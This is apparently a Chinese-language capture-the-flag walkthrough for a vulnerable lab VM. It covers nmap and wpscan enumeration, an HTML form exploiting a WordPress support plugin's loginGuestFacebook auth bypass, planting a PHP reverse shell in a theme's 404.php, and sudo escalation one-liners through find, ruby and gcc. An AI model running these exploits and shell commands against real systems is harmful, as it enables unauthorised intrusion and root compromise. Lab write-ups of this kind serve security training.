kali：192.168.111.111

靶机：192.168.111.178

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.178

访问80端口发现存在一个目录

访问该目录发现是wordpress

wpscan扫描发现存在一个插件，和一个用户:wp-local

访问该连接http://192.168.111.178/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1，发现密码hackNos@9012!!

该插件存在越权

漏洞利用

访问该地址http://192.168.111.178/g@web/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/wpsp_getCatName.php，添加以下html代码

<body>
<form action="http://192.168.111.178/g@web/wp-admin/admin-ajax.php" method="post">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" name="">
</form>
</body>

输入框填入发现的wp-local用户名，之后点按钮提交

然后访问http://192.168.111.178/g@web/wp-admin进入后台

修改网站源码，写入kali自带的php反弹shel脚本/usr/share/webshells/php/php-reverse-shell.php

写入完成后访问http://192.168.111.178/g@web/wp-content/themes/twentyseventeen/404.php

提权

使用之前发现的密码hackNos@9012!!，切换到security用户，查看sudo -l

提权方法https://gtfobins.github.io/gtfobins/find/#sudo

输入命令sudo -u hackNos-boat find . -exec /bin/sh \; -quit，切换到hackNos-boat用户

hackNos-boat用户sudo -l

提权方法：https://gtfobins.github.io/gtfobins/ruby/#sudo

输入命令sudo -u hunter ruby -e 'exec "/bin/sh"'，切换到hunter用户

hunter用户sudo -l

提权方法：https://gtfobins.github.io/gtfobins/gcc/#sudo

输入命令：sudo -u root gcc -wrapper /bin/sh,-s .，切换到root用户

获得flag